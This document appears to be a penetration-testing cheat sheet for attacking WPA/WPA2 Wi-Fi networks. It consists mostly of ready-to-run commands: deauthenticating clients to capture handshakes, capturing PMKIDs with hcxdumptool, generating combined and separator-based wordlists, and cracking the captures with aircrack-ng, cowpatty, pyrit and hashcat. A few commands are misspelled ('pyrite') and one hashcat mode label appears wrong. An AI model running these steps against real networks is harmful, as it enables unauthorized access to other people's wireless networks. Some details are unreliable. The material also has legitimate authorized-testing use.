WPA/WPA2

Standard approach - No roaming

Deauthenticate a supplicant
aireplay-ng -0 20 -a <ap_mac> -c <supplicant_mac> <wlan1mon>

1.Deauthenticate with the broadcast address can be very efficient and convenient
2.Airodump should say “WPA Handshake”

Dictionary generation

Concatenate + Uppercase

WifiKey, Networkkey…

nano lower_dico.txt
sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt
/usr/lib/hashcat-utils/combinator.bin lower_dico.txt lower_dico.txt > ll_dico.txt
/usr/lib/hashcat-utils/combinator.bin lower_dico.txt upper_dico.txt > lu_dico.txt
/usr/lib/hashcat-utils/combinator.bin upper_dico.txt lower_dico.txt > ul_dico.txt
/usr/lib/hashcat-utils/combinator.bin upper_dico.txt upper_dico.txt > uu_dico.txt
cat ll_dico.txt lu_dico.txt ul_dico.txt uu_dico.txt | sort | uniq > concatenated.txt

One Separator + Uppercase

Use this technic with multiple separators: -_$*
Wifi-key, Network-Key…

nano lower_dico.txt
sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt
hashcat -a 1 upper_dico.txt lower_dico.txt -j '$<SEPARATOR>' --stdout >> ul_seperated.txt
hashcat -a 1 upper_dico.txt upper_dico.txt -j '$<SEPARATOR>' --stdout >> uu_seperated.txt

Two Separator + Uppercase

Use this technic with multiple separators: -_$*
Wifi-Key-Network, Mobile-Wifi-Key…

nano lower_dico.txt
sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt
hashcat -a 1 upper_dico.txt uu_seperated.txt -j '$<SEPARATOR>' --stdout >> uuu_seperated.txt

Add rules

Each generated dictionary can be enhanced by applying rules on it

cat <created_dico.txt> | hashcat -r </usr/share/hashcat/rules/best64.rule> --stdout | sort | uniq > <final_dico.txt>
Crack

aircrack

aircrack-ng -w <dico> <cap.pcap>

Rainbow tables - cowpatty

genpmk -f <dico> -d <computed_hashes.txt> -s <essid>
cowpatty -r <cap.pcap> -d <computed_hashes.txt> -2 -s <essid>

GPU - pyrit

pyrit eval
pyrit -i <dico> import_passwords
pyrit -e <essid> create_essid
pyrite batch
pyrite -r <cap.pcap> -b <ap_mac> attack_db
rm -r ~/.pyrit/blobspace

GPU - hashcat

https://hashcat.net/cap2hccapx/
hashcat64.exe -m 2500 -r rules\best64.rule cap\capture.hccapx dict\custom_dict.txt

Roaming - PMKID attack

It only works on AP that supports roaming.

Installation
apt install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev
cd /opt
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
make install
cd /opt
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install
cd /opt
Attack
1.Traffic capture

Opportunistic attack without mac filtering

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filtermode=2 --enable_status=3

Target one or more BSSID

Copy one or more BSSID in a file with all chars in uppercase and without any separator (remove all “:”).
Example: 50D72257AC2F

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filterlist=<mac.txt> --filtermode=2 --enable_status=3
2.PCAP to hashes
hcxpcaptool -z <out.hashes> <pmkid.pcap>
3.Crack

Solution 1
WPA-PMKID-PBKDF2 (16800)

Solution 2

hcxpcaptool -o <hccapx.hashes> <pmkid.pcap>

WPA-PMKID-PBKDF2 (2500)